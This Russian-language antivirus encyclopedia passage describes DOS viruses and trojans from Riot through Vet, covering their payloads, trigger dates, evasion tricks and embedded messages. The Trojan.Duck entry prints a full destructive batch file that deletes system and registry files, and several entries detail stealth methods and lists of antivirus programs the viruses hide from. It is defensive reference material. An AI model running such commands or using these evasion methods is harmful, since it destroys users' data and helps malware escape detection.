Riot.Enemy.757

Содержит текст:
Unknown Enemy © Metal Militia/Immortal Riot
I'm hurt, machineguns firing behind my back
Never had no chance, no way to do a attack
Thisone sure is the last time i guess
Heading for a private deathrow, nothing less
Blood, quickly pumping out from the vound in the vain
Damn, this moment makes you sort of go insane
Close my eyes, had much left to see
Was my fault, but did they have to do it, gee?
Promise me, this hit you will remember
Take one of them down before winter comes in december
Why that month? Well, i like it very much
Fresh, cool air, wonders of the snow to touch
The world is wonderful, what else to say?
Just remember this shit, cause it happends every day

Riot.Evil.769

Неопасный резидентный вирус. Вперемешку с инструкциями ассемблера рас- положены следующие текстовые строки:
Our past is our future!
[INVISIBLE EVIL!] © Metal Militia/Immortal Riot
Dedicated to all the victims..
Greets to B-real!/IR
It's like this and like that and like thisena
It's like that and like this and like thatena
It's like this..
Love to Lisa!
All i ever wanted..
All i ever asked for..

Riot.Flood

Очень опасный резидентный вирус, перезаписывающий программный код. При старте таких программ вирус выводит фразу "Bad command or filename". 21 числа выводит текст "Hey Bud.. You picked the leave with the virus on it!". Имеет текст "Burn:CycleYou picked the leave with the virus on it!© Atomic Morphine/ FLooD 1999".

Riot.Marked.354

При старте выводит сообщение "Bad command or filename", а 21 числа:
In any country, prison is where society sends it's
failures, but in this country society itself is faily
Внутри вируса имеется также текст:
Marked-XWill we ever learn to talk with eachother?
© Metal Militia/Immortal Riot

Riot.Multiplex

Опасный нерезидентный вирус. 5 числа уничтожает 256 секторов диска C:. Содержит тексты "MULTiPLEX © 1994 Metal Militia\ Immortal Riot, Sweden*. Somewhere, somehow, always *.com", "JUNK", "ImRio".

Riot.Pollution

Опасный резидентный вирус. Иногда уничтожает содержимое CMOS-памяти. 6 июня проигрывает какую-то мелодию. Содержит строку "Digital Pollution © '94 Raver/Immortal Riot".

Riot.RatBoy.513, 545, 671

Очень опасные нерезидентные вирусы. По воскресеньям после 15 числа пытаются уничтожить содержимое всех логических устройств жесткого диска, записывая в сектора строки:
Riot.RatBoy.513 - "RaTBoY HaTeS YoU!!! Ihater-u-all\JUNK TEST".
Riot.RatBoy.545 - "RaTBoY WaS HeRe!!! My Vx, Invircible Killer".
Riot.RatBoy.671 - "RaTBoY Loves Mrs. RaTBoY!!! \JUNK TEST".
Riot.RatBoy.545, 671 уничтожают некоторые файлы, видимо, таблицы антивируса InVircible.

Rmb

Очень опасный загрузочный вирус. При заражении не сохраняет оригинальные загрузочные сектора. При нажатии на Ctrl-Break вирус может уничтожить по 14 секторов на всех головках "винчестера".Содержит строку "RMBDRMCCQBDWRM".

Rock.1076

Неопасный нерезидентный вирус. По четным числам с 10-го по 26-е, кроме декабря, субботы и воскресенья, оставляет в памяти резидентный код, который "трясет" экран по 20 секунд каждые 20 минут.

Rogue.1208

Опасный резидентный вирус. Уничтожает файлы с расширением DBF, записывая в них первый байт 'R' и производя с остальным содержимым файла операцию XOR 0Dh, до первого символа 0Dh. Уничтожает файлы CHKLIST ???. В месяц, когда сумма значения года и значения месяца равна 2000 вирус выводит текст:
Now you got a real virus! I'm the ROGUE ...!

Roman.1439, 1995

Неопасные резидентные шифрованные вирусы. При старте программы DRWEB вирусы обезвреживают свои резидентные копии (освобождают INT 21h), которые в дальнейшем (через INT 1Ch) опять восстанавливают свою работоспособность. При удалении файла ROMAN!.113 вирусы выводят на экран текст:
Roman.1439:
Экспериментальная школа
Roman.1995:
Внимание! В системе находится вирус Roman (1) Virus! Это абсолютно безвредный вирус, заражающий .COM файлы. Никаких причин для беспокойства нет. Он написан автором просто ради спортивного интереса. Если Вам нежелательно его присутсвие в системе (а он Вам ничем не помешает), просто уда- лите все .COM файлы, содержащие на 4 и 5 позиции от начала символосочетание "RB" - это признак инфицированности - и пере- запустите компьютер.
Roman (1) Virus написан осенью 1997 года.
© -= Pilz =-, 16 years old.
Экспериментальная школа, физико-математический лицей.909-436X
Нажмите на любую клавишу, чтобы продолжить работу.

RP (1,2)

Опасные загрузочные вирусы.RP (1) 17 декабря выводит текст "RP wants to say hello!" и уничтожает MBR. RP (2) в мае выводит текст "Only bugs exist!".

RPS (1-3)

Очень опасные загрузочные вирусы. Заражают MBR винчестера и сектора флоппи-дисков, не сохраняя оригинальные загрузчики. При 50-ой загрузке с инфицированного диска, или при попытке записи в инфицированный MBR, или при не нахождении активного загрузочного сектора, вирусы уничтожают информацию в секторах дисков. Содержат тексты "RPS", "RPS2", "RPS3".

RTP.Demo.4838

Неопасный нерезидентный полиморфный вирус. Содержит тексты:
RTP 0.1b Demo Virus © 1998, The Soul Manager
Greetings Mr Kaspersky, we've been expecting you
If you can see this text, you are reading AVPVE!merely dueto a philanthropic trait of the author......

Russel.3072Б

Неопасный резидентный полиморфный вирус. Имеет текст "RUSSEL FARADAY". По возможности устанавливает свою резидентную копию в область UMB.

T

TaiPan.Hooze

Неопасный резидентный вирус. 5 августа устраивает "шутки" с разверткой монитора. Содержит текст "[Hooze Virus 1.0 (Tai-Pan clone)]".

Tarakah.4064

Неопасный нерезидентный шифрованный вирус. Если во время заражения файлов произошла ошибка, то вирус выводит одно из следующих сообщений:
ERROR OF FUNCTION'S NUMBER
FILE NOT FOUNDED
PATH NOT FOUNDED
TOO MANY OPENED FILES
ACCESS IS NOT OPEN
ERROR OF FILE'S NUMBER
BLOCK OF MEMORY RULING IS BROKEN
TOO FEW MEMORY
ERROR OF ADRESS OF MEMORY'S BLOCK
ERROR OF EQUIPMENT
ERROR OF FORMAT
ERROR OF ACCESS
ERROR OF DATA
I DONT KNOW WHOT HAPPENED:...... KAKAYA-TO
ERROR OF DEVICE
ERROR OF DIRECTORY
IT'S NOT RIGHT DEVICE
DONT ANY FILES YET
А также иногда просит нажать клавишу F8 и выводит следующие сообщения:
Nu vot Ya i v ECONOME !
Eto snova Ya - TARAKAH is tvoego computera
I opyat Ya
POSOVI leontya veniaminovicha iz 215, YA HOCHU EGO !
LEONTIY ! osvoil li ty BASIC nakonec
decanom mogesh ty not to be, no SUPERCAL ty znat obyasan !
-leontiy KAKASHKA-
TELEFON DLYA VASHEY REKLAMI-13-29-66 (SPROSITE EVREYA)
POGALUYSTA, KOZLIK,
NE BUD GADOM
NAGMI KEY F8
CHORT BOZMI, KAKOY YOU DUB
YA GE SKAZAL-F8, POPROBUY ESCHO
NU DEREVO, POSLEDNIY RAZ PROSHU
NE TAKOY UG YOU DURAK
OTVALI, YA OBIDELSY
OX, OX, OOOOO YA TORCHU
ESCHO DAVNI RAZOCHEK, DURACHOK
NE TUDA POLEZ, DURACHOK
AX, AX, UX, EX, YA LUBLU TEBYA, DURASHKA
NU WE ESCHO VSTRETIMSYA, PROKAZNIK...
NAGMI ANYKEY

Taz.987, 1041

Опасные резидентные вирусы. Удаляют некоторые антивирусные программы, после чего в Taz.1041 планировался вывод сообщения:
FUCKIN IT
uhhh.....
huh huh
Содержит тексты "[TAZ-10] By The WРТ$ИL", "© Sector Infector 1993", "°±І TТZ-10 І±°", "Released 12-06-93", "Yes, it is a Firefly Hack!", "I Miss Ya, Taz!", "Time to FUCK it UP!" .

TCE.Persecute

Неопасный резидентный полиморфный стелс - вирус. При открытии инфицированных файлов удаляет свой код из них, но только в том случае, если эти файлы открываются не архиваторами. Вирус проверяет имя программы, открывающей файл. Вирус не заражает файлы из списка (по 2 символа на имя): COF-AV-VTBVI00VBCHSCDENDSPPRARPKRAUCLHZIUUIV. Вирус удаляет файлы CHKLIST.MS, CHKLIST.CPS, ANTI-VIR.DAT.

Teacher.2000

Неопасный резидентный вирус. Перехватывает INT 21h, 28h.

Temptation

Неопасный загрузочный стелс-вирус. Иногда при загрузке с зараженного жесткого диска выводит сообщение:
©Light General
THE LAST TEMPTATION

TenBytes.1411, 1514

Очень опасные резидентные вирусы. После сентября при записи в файл, сдвигают буфер для записи (DS:DX) на 10 байт.

Tentacle.10496

Опасный резидентный полиморфный вирус. Записывает свой зашифрованный полиморфный код в конец файла-жертвы, после него записывает "длинный" JMP FAR на свой код и корректирует таблицу перемещаемых символов. Если файл содержит оверлей, то вирус "сдвигает" оверлей вниз и записывает свой код между телом файла и оверлеем. При открытии GIF- файлов с вероятностью 1/8 вирус переименовывет данный файл в имя TENTACLE со случайным расширением и записывает в оригинальный файл изображение щупальца осьминога и надписью "I'm the Tentacle Virus" в GIF-формате.

Tequila

Неопасный файлово-загрузочный полиморфный стелс-вирус. Заражает MBR жесткого диска и EXE-файлы при их открытии или запуске. Иногда выводит на экран картинку, напоминающую силуэт самолета и текст:
Execute: mov ax, FE03 / int 21. Key to go on!
При выполнении данных инструкций вирус выводит на экран следующий текст:
Welcome to T.TEQUILA's latest production.
Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/Switzerland.
Loving thoughts to L.I.N.D.A
BEER and TEQUILA forever !

Tequila.5volt

Неопасный резидентный полиморфный вирус. Не заражает файлы WIN*.*, CHKDSK*.*, BACK*.*. Содержит текст:
This is a beta version of the '-5 Volt' virus. A final and error free one will never follow because I've got enough of viruses. Now a message to the programmers of Turbo Anti Virus: You do a dangerous play with INT 21h in your TSAFE utility. It took me quite a long time to make the virus compatible with TSAFE. Please use clean programming technics in your next version. Today it's a Saturday and a big party with a lot of TEQUILA takes place! Wow!! Greetings to the U.S. Army in Iraq.

Terra.1027, 1042

Неопасные резидентные вирусы-спутники. Создают вирусный COM-файл- спутник для файлов с расширением EXE. Не заражают файлы, начинающиеся на COMMAND,IBM,ET,PC,TB, CKVI,KLVI,DEVI,BTOOL,RTOOL,TDISK, SCAN, CLEAN, HUNT,F-,TR,G,Z.

Terrorist.1740

Очень опасный нерезидентный шифрованный вирус. 15 октября выводит текст "HAPPY BIRTHDAY OKSANA". Хранит некоторые свои счетчики в конце файла C:\COMMAND.COM. Может прочитать 16 первых секторов диска C: в память, уничтожить содержимое этих 16 секторов на диске и вывести текст:
WARNING
ВНИМАНИЕ
Я Вирус ТЕРРОРИСТ ! Ваш компьютер захвачен в заложники !
Если вы выключите машину или прервете программу,то информацию
о таблице размещения файлов (FAT) вам уже никто не востановит !!!
Если вы хотите чтоб у вас было все в порядке вы должны
выполнить мои условия :
Подождите до 3 часов ночи !!!
Если подождете обещаю все починить !
ПРИЯТНЫХ СНОВИДЕНИЙ !!! (Crazy)
После чего выводит в левом верхнем углу экрана текущее время и ждет наступления 3 часов ночи. После чего записывает обратно на диск сохраненные в памяти 16 секторов диска C:. Иногда может вывести также сообщение "I~m here !".Содержит тексты "ПОЛУЧАЙТЕ СУКИ","CRAZYCRAZY !".

Tet.365, 393, 409, 474, 733

Неопасные (Tet.733 -опасен) нерезидентные вирусы. Содержат строку "383" из-за которой и получили свое название - Three Eight Three. Tet.733 может разрушать файлы, записывая в них код, который выводит текст "This program requires Microsoft Windows." и "перегружает" систему. Иногда может вывести текст "Почтим ЗАВИСАНИЕМ память китайского хакера, убитого подлыми коммунистами." и "вешает" систему. Tet.733 также содержит текст "383 v1.5 ©LovinGOD, fUcKRAINE.".

Thc.1058

Опасный резидентный вирус. При открытии файлов, содержащих первый байт E9h или B8h, вирус записывает в них 5 байт, вызывающих перезагрузку системы. Также уничтожает 5 первых байт в файлах, первый байт которых - EAh. Содержит текст "Aidstest Fucker. Copyright © by Troitsk Hackers Club".

Thunder.1543

Опасный резидентный шифрованный вирус. Внедряет свой расшифровщик (21 байт) в середину файла,а основной зашифрованный вирусный код записывает в конец файла. "Перехватывает" INT 13h, 21h,а после 20 декабря и INT 8. При чтении или записи некоторых секторов(в которых встречается какая-то последовательность байт (?)) вирус возвращает ошибку чтения или записи.

Tiso.1279

Неопасный файлово-загрузочный шифрованный вирус. Иногда, при загрузке, системы выводит "Nech zije Jozef Tiso, prvy slovensky prezident !".

Tmc.4829, 5440

Неопасные резидентные полиморфные вирусы.Используют довольно интересный полиморфный механизм. При старте инфицированной программы, вирус получает управление и производит создание в памяти своей новой копии. Вирус хранит в своем теле таблицы по которым по определенным законам строит свой код. При построении этого кода вирус может внедрить в любое место кода (вместо очередной инструкции) команду перехода (E9 ?? ??) в свободное (не занятое еще "рабочими" инструкциями) место и продолжить построение своего кода с этого места.Вирус строит таблицы "уже занятых" областей и "настраиваемых" адресов для корректного создания своего потомка. Также он способен варьировать безусловными переходами (например, замена JE на JNE) в некоторых ситуациях. Затем вирус расшифровывает свой код, который также не является постоянным и устанавливает в память "на INT 21h" свою резидентную копию. Причем обработчик INT 21h также является непостоянным и имеет различные смещения. Далее эта резидентная копия заражает файлы только этим кодом. Для текущего сеанса работы (до следующей установки в память) все копии вируса при заражении файлов будут одинаковы.

Todor.1993

Опасный полиморфный вирус. После 15 августа шифрует первый сектор первой копии FAT. Не заражает файлы, имеющие по смещению +20h строку ©Todor и файлы, упакованные утилитой LZEXE v.0.90. Содержит ошибку, в результате которой каждый 6 файл будет неработоспособен.

Tony.338

Опасный резидентный вирус. Размещает свою резидентную часть в области таблицы прерываний по адресу 44:100h. Инфицирует COM-файлы, внедряя свой код в область нулей, если в файле таковая имеется. При установке в память пытается сразу же заразить командный процессор. В вирусе имеется ошибка, в результате которой инфицированные файлы могут быть неработоспособными и лечению неподдающимися. Содержит строку "Tony".

TPE.CivilWar.1979, TPE.CivilWar.1994, TPE.CivilWar.1997, TPE.CivilWar.2049

Полиморфные вирусы. TPE.CivilWar.1979, TPE.CivilWar.1994 и TPE.CivilWar.1997 - нерезидентные. Содержат строки:
TPE.CivilWar.1979:
Civil War IV, © 1993 *.com
For all i'v seen has changed my mind
But still the wars go on as the years go by
With no love of God or human rights
'Cause all these dreams are swept aside
By bloody hands of the hypnotized
Who carry the cross of homicide
And history bears the scars of our Civil Wars.
[ DH / TridenT ] [ MK / TridenT ]
TPE.CivilWar.1994 и TPE.CivilWar.1997:
Civil War IV v1.1, © Jan '93 *.com
For all i've seen has changed my mind
But still the wars go on as the years go by
With no love of God or human rights
'Cause all these dreams are swept aside
By bloody hands of the hypnotized
Who carry the cross of homicide
And history bears the scars of our Civil Wars
[ DH / TridenT ] [ MK / TridenT ]
TPE.CivilWar.2049 - резидентный вирус. Содержит строку:
Civil War V v1.0, © Jan '92
[ DH / TridenT ][ MK / TridenT ]

TPE.Dgme.1758, 2648, 2518

Неопасные нерезидентные полиморфные вирусы. Содержат строку: DGME © 1993 American Eagle Publications, Inc., All Rights Reserved.

TPE.Gambit.2259

Неопасный полиморфный резидентный вирус-спутник. Содержит строку "Gambit 1.0 by Viper [NuKE][ MK / TridenT ]".

TPE.Girafe

Неопасный резидентный полиморфный вирус. Не заражает файлы с именами CO*.*, SC*.*, CL*.*, VS*.*. Содержит строки текста: "COSCCLVSNEHTTBVIFIGIRAFEMTBRIM", "[ MK / Trident ]", "Amsterdam = COFFEESHOP!". По пятницам при запуске инфицированной программы с вероятностью 1/256 выводит сообщение "LEGALIZE CANNABIS" и изображение зеленого листа. См. MtE.Coffeeshop

TPE.Kela.4546

Полиморфный стелс-вирус. В пятницу 13 числа выводит красивую переливающуюся всеми цветами картинку с надписями "KELA". Содержит тексты:
This is KELA-17 version virus.
KELA-17 very nice virus . Ha Ha HaHa
KELA - 17.Выражаю свою благодарность автору TPE, KELA.
Copyright © 1994 by KELA. All Rights Reserved. KELA вечен. Смерть
Лозинскому и Мостовому. Смерть всем пользователям ЭВМ.

TPE.Lamer

Опасный резидентный полиморфик. В декабре уничтожает 30 первых секторов диска C:

TPVO.3783

Неопасный резидентный стелс-вирус. Заражает COM, EXE, NewExe - файлы и загрузочные сектора дисков. Внедряет свой код в ядро DOS, поэтому его очень сложно найти в памяти компьютера.

Traka.1471

Неопасный файлово-загрузочный вирус. Содержит текстовую строку [TRAkA- TRAkA]/ARGENTiNA

Trakia.561, 570, 653, 1070

Резидентные вирусы. Trakia.653, 1070 - опасны. Trakia.653 портит файлы, имеющие расширения DWG, DWF, DXG, DXF, а Trakia.1070 производит поиск какой-то строки в стартующих EXE-файлах и если находит ее, то правит этот файл.

Transmitter.1044, 1747, 1899

Неопасные резидентные вирусы. Transmitter.1044 10 числа пытается сдвинуть весь текст на экране, но может это сделать только на черно- белых мониторах.Transmitter.1899 14 числа может вывести на экран текст:
Do you Want to kill computer ?
Don't press any key !
Your MBR, BOOT ,FAT & ROOT only in memory,
and if you want to destroy all DATA in computer,
then you can press any key
but if you want to recover this sectors then,
you must press right key!!
Transmitter II (1996) (Dangerous Virus)
Find ME : u/56@\fir6#Ki*|Kj6DzGoYHW2wqd.q
Вирусы содержат тексты:
Transmitter.1044:
Transmitter © by MYSELF 1996
Transmitter
Transmitter.1747:
Transmitter two © by MYSELF 1996
transmitter
Transmitter.1899:
Transmitter three © by MYSELF 1998 /Hail 2 Murmansk!/ :~(
transmitte3

Traven.515

Неопасный нерезидентный вирус. Иногда "трясет" экран. Содержит строку "by Traven(Traveller)".

Trident.346

Полиморфный опасный вирус. После заражения файла выводит на экран рисунок.

Tripper.1952

Неопасный нерезидентный вирус. В пятницу может вывести одно из следующих сообщений:
Hardware detection error: CPU bad or missing.
Exception #0D: Attempt to write to write protected CPU register.
DMA failure: access is too direct.
Access violation: application terminated
DPMI error #013: HMA is too high, need line A21.
Divide overblow (or ...flow, do you know?).
By the way, do you know what job is blow?
Fucked file corrupt.
Virus warning: This file is possibly infected by Tripper!
Incorrect DOS perversion.
Incorrect user version, upgrade, please.
This program must be run under Win32.
Abnormal program termination: consult with her psychiatrist.
fuck: jmp far 0ffffh:0000h
Oracle® proclaims: Enabling Information Age Through the Network Computing.
Hitler kaput!
Lozinsky - woodpecker, AIDSTest -
Tripper message:
One more file succesfully infected by Tripper.
Shit! A fucking error occured!
Write protection will not save you!
You bastard! Put the diskette in right now!
При запуске инфицированной программы с ключом /vir??? вирус выводит текст:
Tripper® Version 1.0 for Intel-8086®
©Copyright Golem 01/08/98(1998)

Trojan - "троянские" программы.

Содержащийся в данных программах код не является вирусным кодом. Как правило, данные программы несут в себе деструктивные функции.

Trojan.BPC

Производит поиск файлов *.* и записывает в них 392 байта кода, уничтожающего 255 секторов первого жесткого диска и выводящего на экран текст:
CONGRATULATIONS !
Y0UR ZYZtEM WAZ PHUCKEd bY
BBS PhAcKeRz ClUb `1994 !
UZ 0UR fREE 20ftWARE.....
:: © 1994 BBS PhUCkERZ C1Ub ::

Trojan.Duck

Данный троянец получен с помощью программы BAT2COM из пакетного файла следующего содержания:
---------------------------
Da Ultimate Crack
by Plucky Duck &
Da AC-DC Boy
---------------------------
Cracking...
Done...
DEL c:\windows\win.ini
DEL c:\windows\system.ini
ATTRIB -r -a -s -h c:\command.com
DEL c:\command.com
ATTRIB -r -a -s -h c:\windows\user.dat
DEL c:\windows\user.dat
ATTRIB -r -a -s -h c:\windows\user.da0
DEL c:\windows\user.da0
ATTRIB -r -a -s -h c:\windows\system.dat
DEL c:\windows\system.dat
ATTRIB -r -a -s -h c:\windows\system.da0
DEL c:\windows\system.da0
ATTRIB -r -a -s -h c:\io.sys
DEL c:\io.sys

Trojan.GetIt

Данная программа предназначена для воровства паролей для Novell NetWare. Троянский код записывается по вирусному принципу к любой COM- программе. При старте такой программы, данный "троянец" устанавливает свою копию резидентно в память "на INT 21h", ждет старта программы LOGIN, после чего записывает вводимый пользователем пароль в указанный в теле "троянца" файл.

Trojan.Himan

Производит поиск в среде окружения (environment) программы указателя "MAXIMUS=". Далее в указанном каталоге ищет файл MAX.OVL и модифицирует в нем по определенным смещениям 2 байта. Содержит текст "-=HiMAN=-".

Trojan.TimeBomb

Троянская программа TimeBomb записывает в MBR жесткого диска деструктивный код, который уничтожает содержимое всего жесткого диска в определенный, указанный пользователем день. При записи в MBR "троянца" содержимое оригинального загрузчика сохраняется в файле MBR.BAK.

Trojan.Xmas

На фоне поздравления с Рождеством переименовывает файлы C:\IO.SYS и C:\MSDOS.SYS в C:\*.SIS, а файлы C:\WINDOWS\SYSTEM.INI, C:\WINDOWS\WIN.INI в C:\WINDOWS\*.INY. После чего удаляет себя.

Trooper.2259

Резидентный стелс-вирус. Содержит текстовые строки "3О4О5О6О7О8Оd", "TROOPER V1.0 Hungary-7500", "EXECOMCLIPPERCOMSPEC=", "BEFKNOW".

Trout.6804

Опасный резидентный полиморфный вирус. Первым делом вирус пытается найти файлы по маскам C:*.COM, C:\DOS\KEYB.COM, C:\DOS\*.COM, *.COM и заразить 5 файлов. Удаляет файлы CHKLIST.MS,CHKLIST.CPS,ANTI-VIR.DAT, \SCANCRC.CRC,\_CHK.CHK,\NAV_._NO.Вирус скрывается в памяти от следующих программ:
SCAN.NETSCAN.CLEAN.VSHIELD.F-PROT.VSAFE.MSAV.CPAV.NAV.TBAV.TBSCAN.
VDS.NOVI.AVP.-V.-VPRO.VIREX.AVSCAN.VI-SPY.GUARD.FINDVIRU.TNT.TNTAV.
HTSCAN.NEMESIS.NOD.ITAV.VI.VIRIT.IM.WIN.TD.DEBUG.
При старте любой из этих программ, вирус "отпускает" захваченный им INT 21h, шифрует свою резидентную копию с помощью полиморфного механизма, "перехватывает" INT 22h, устанавливая его на полиморфный расшифровщик, уничтожает свою незашифрованную копию в памяти и отдает управление DOS. После обратного получения управления "через" INT 22h, по окончании работы антивирусной программы, вирус расшифровывает свой код и снова "перехватывает" INT 21h. Вирус содержит текст:
This is "The Second NewBorn Trout" virus
Programmed in the city of Milan, North Italy
[C] The Tricky Trout 1995
Mutation Engine: TT-PEB (Tricky Trout Plurimorphic Encryptor Builder)
version 2.01 (TPE standard)

Trurl.846

Содержит строки "Bengal Tiger, v3p0x ## By Trurl, the great constructor, 1993## Buenos Aires, Argentina" и "Trurl".

Trust.687

Неопасный резидентный вирус. Устанавливает свою копию в область видеопамяти BB00:0000 и "перехватывает" INT 10h, 21h. При смене видеорежима (f.0 Int 10h) вирус "освобождает" "захваченные" им прерывания. Иногда выводит текст:
Принцип взаимного довереия выше взаимных обязательств.
С. Мавроди.

Truxested.based - вирусы

Данные вирусы сконструированы, видимо, для "демонстрации" видеоэффектов различных вирусов.
Содержит тексты:
Hullo ! Welcome to 2UP virus. Don`t try so hard!
Hallo Mr.Virusolog,now you decod me !It's about fucking time.
What do you think about 2UP Virus ?
This Virus Was Designed in 1992-1994 .It Dedicated For Nobody..
I Want To BreakFree ! Right Now
2UP©1994
AID COMMAND ANTI AV HOOK SOS TSAFE -V SCAN NC VC TNT ADINF
Вирус не заражает программы, содержащие в своем имени сочетания букв из последней строки.

Tsh.Banana.2413

Неопасный резидентный шифрованный стелс-вирус. Иногда (видимо, при копировании кода резидентного вируса из памяти в файл) может вывести на экран или записать в файл текст:
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
ЙНННННННННННННННННННННННННННННННН»±
є © 1994 Trash Soft & HardWare є±
ИННННННННННННННННННННННННННННННННј
Содержит тексты:
Dig here!
Sometimes the banana is just a banana
ЙНННННННННННННННННННННННННННННННННН»
є The people are still having sex, є
є and nothing seems to stop them...є
ИННННННННННННННННННННННННННННННННННј
Don't try to fuck me , Hacker!
Somebody in this world is having sex right now...
Designed in Tver. 1993-94
It's dedicated to all guys from Tver Politechnical Institute,
especially EVM-24, ATP-25, ASU-21...
Release date: 23-May-1994

Tubo

Неопасный загрузочный вирус. Иногда расшифровывает и выводит на экран текст "ШstanbulCCC was here. He He". Свое название получил за то, что в выводимой на экран строке в ее зашифрованном состоянии присутствует текст "tubo".

Tumot.432

Неопасный резидентный вирус. При старте программ, имеющих в своем имени буквосочетания "WEB." или "AIDS" вирус обезвреживает свою резидентную копию в памяти, а затем снова ее активизирует.

Tune.544

Неопасный резидентный вирус. При нажатии на Ctrl-Alt-Del вирус издает некие музыкальные звуки и возвращает управление в DOS.

Tune.663

Неопасный резидентный вирус. После запуска 33 программ сдвигает изображение на экране вниз и влево.

Turn.557, Turn.571

Неопасные резидентные вирусы. 31 числа изменяют на зеркальные (перевернутые) изображения букв латинского алфавита от 'A' до 'Z', по одной букве после каждого запущенного на исполнение COM-файла.

Turner.3276

Опасный резидентный полиморфный вирус. Располагает свою резидентную копию в области памяти EMS, и только 215 байт располагаются в верхних адресах памяти. Эти 215 байт производят анализ вызываемых функций INT 21h и производят передачу управления основному вирусному коду. В январе вирус уничтожает содержимое CMOS-памяти, выводит сообщение:
The Turner Virus Version 3.56
This virus was written in Voronezh in July of 1993
Modified and enhanced with mutant engine & high implantation
In July-November of 1995 by RingWraith
TRY TO CATCH ME IF U RELY K00L!
CMOS ...perverted
MBR ...perverted
Whole disk ...wait...
после чего уничтожает содержимое секторов первого жесткого диска. Содержит тексты "EMMXXXX0", "=YooHoo=", "SHUTEND".

TV.730

Опасный резидентный вирус. Периодически стирает сектора диска C:. Содержит строку "TV".

Twofs

Опасный загрузочный вирус. После 256 загрузок с жесткого диска уничтожает содержимое 102 первых секторов первого жесткого диска.

TyGde.3072

Опасный резидентный зашифрованный вирус. При нахождении на экране строки "au! ty gde" вирус открывает устройство COM2 на запись (как файл функцией f.3Dh Int 21h), переопределяет его также на чтение и запускает командный процессор. Данные манипуляции необходимы, видимо, взломщику для "вскрытия" станций FIDO.

V

Vacsina.1206, 1212, 1269, 1339

Неопасные резидентные вирусы. Vacsina.1206, 1212 издают звуковой сигнал при заражении файла. Vacsina.1269 иногда выводит на экран текст "Az sum vasta lelja.". Содержат строку "VACSINA".

Vandal.1895

Неопасный резидентный шифрованный вирус. Если значение минут системного времени равно 20, то вирус выводит на экран текст:
Вас приветствует:
очень опасный полиморфный файлово-загрузочный
стелс-вирус: Вандал. 1996г. г.Волгоград.
Етот вирус написан великорусским вирусописателем
пока не очень извесным под кличкой Dark Vandal!!!

Vanitas.2040, 3712

Опасные резидентные зашифрованные вирусы. Пытаются заразить файлы C:\WINDOWS\COMMAND.COM и C:\COMMAND.COM. 27 марта проявляются каким-то видеоэффектом. Содержат тексты:
Vanitas.2040:
VANITAS++ v1.1 ©GR97 by ANAX.Member of .
Everyone is Original. [E-75]Chill-Out.
Vanitas.3712:
VANITAS++ v2.0 GR©97 by ANAX. [E-75] goes to Hell.
Have a nice death...

Varna.1536

Опасный файлово-загрузочный вирус. 8 числа месяца уничтожает содержимое первого жесткого диска. "Перехватывает" INT 13h и 21h. При чтении заголовка EXE-файлов (28 байт) заражает данные файлы.

VarWorm.913

Неопасный резидентный зашифрованный вирус. При заражении файлов записывает перед собой до 64K случайных байт. Содержит текст "Worm!".

VBasic

Пытается заразить *.COM и *.EXE-файлы на всех дисках. Иногда выводит сообщение "Access denied." и возвращает управление DOS. Содержит строку "*.EXE BASRUN BRUN *.COM IBMBIO.COM IBMDOS.COM COMMAND.COM *.*".

VCC.based - вирусы

Данные вирусы сконструированы с помощью вирусного конструктора VCC. Вирусы, созданные с помощью VCC-конструктора заражают COM-файлы. Содержат текст "[IE-VCC v0.19с]".

VCL.466

Неопасный нерезидентный вирус-спутник. Иногда издает "щелкающие" звуки. Содержит текст "[VCL]".

VCL.662

Опасный нерезидентный вирус. Содержит тексты:
- Это Рожа Лозинского,Понявшего,Что aidstest-г08но
- А Вот Мостового Еще Не Пpохватило...
CHLEN To Danilov's Laboratory !

VCL.Mom.974

Опасный нерезидентный вирус. В апреле после 7 числа уничтожает содержимое логических разделов жесткого диска, после чего выводит сообщение:
You are hereby notified that your system has just encountered
a very unusuall disk error. This error can be very fatal!!!
Please check your system for any further errors.
DOS EXCEPTION ERROR #13
Содержит строку "MoM#\/# ( ) #\/#".

VCL.Timothy

Неопасный нерезидентный вирус-спутник. 17 января или по понедельникам выводит сообщение:
Timothy Leary's dead!
No..hey's outside looking in...
Также содержит текст "[VCL] TIMOTHY LEARY WANTS TO TALK410-721-9580. TIMMY TEACH THEYOUNG THEY NEED GUIDANCE-GRAViTY'S RAiNBOW".

VCode.2540

Очень опасный нерезидентный вирус. В декабре пытается уничтожить информацию на всех доступных логических устройствах жесткого диска. Содержит зашифрованные текстовые строки "COMMAND.COM", "X:\CONFIG.SYS".

VComm.637

Неопасный нерезидентный вирус. Производит поиск и заражение *.EXE-файлов в текущем директории. При заражении вирус увеличивает размер файла до величины кратной 512 байт, после чего приписывает свой код. Вирус увеличивает количество перемещаемых элементов EXE -файла на 1. Вирус оставляет в сегменте BFFE:0000h резидентную программу на INT 13h, запрещающую запись на диск.

VCS.based - вирусы

Данные вирусы сконструированы с помощью вирусного конструктора Virus Construction Set. Заражают COM-файлы. Опасны. Уничтожают содержимое файлов C:\AUTOEXEC.BAT и C:\CONFIG.SYS.

Vengeance.723

Очень опасный вирус. 20 числа любого месяца выводит сообщение "*** Vengeance is ours! ***", после чего пытается уничтожить отформатировать два жестких диска. Содержит также строку "SKISM/Phalcon '92".

Verify

Опасный загрузочный вирус. 25 числа при записи на диск (f.03 Int 13h) изменяет значение регистра AH на значение 04 (verify).

Veronika

Неопасный boot-вирус. После заражения 15 дисков выводит такой же текст, как и вирус Veronika.1549, после чего "завешивает" систему.

Veronika.1549

Опасный резидентный зашифрованный вирус. При 128 обращениях к гибким дискам (f.0Eh INT 21h) записывает в Boot-сектор флоппи-диска код, производящий, при загрузке с данной дискеты.
Содержит также строки "Veronika" и "Veronika P.".

Verwolf.3502

Неопасный нерезидентный вирус. Оставляет в памяти, по адресу 0040:0054h резидентный код, способный "завесить" систему при старте некоторых программ. Содержит текст "My name is VERWOLF1 !".

Vet.1377

Неопасный резидентный вирус. Заражает COM и EXE-файлы, переводя их в формат EXE-файла. Причем EXE-файлы заражает по нестандартной схеме: записывает в начало файла свой код, со своим EXE-заголовком, потом записывает программный код файла-жертвы, после которого записывает таблицу перемещаемых символов (relocation table). Таким образом, при лечении таких EXE-файлов, их восстановление в оригинальное состояние, практически, не предоставляется возможным. Но восстановленный EXE-файл, в большинстве случаев, должен оказаться работоспособным. При старте программы, содержащей в своем имени словосочетание "fico", вирус читает 10 первых секторов жесткого диска в память, в область параметров загрузки данной программы (ES:BX) и выводит текст "Жадность погубит компанию Фико !". Содержит текстовую строку "VET!".

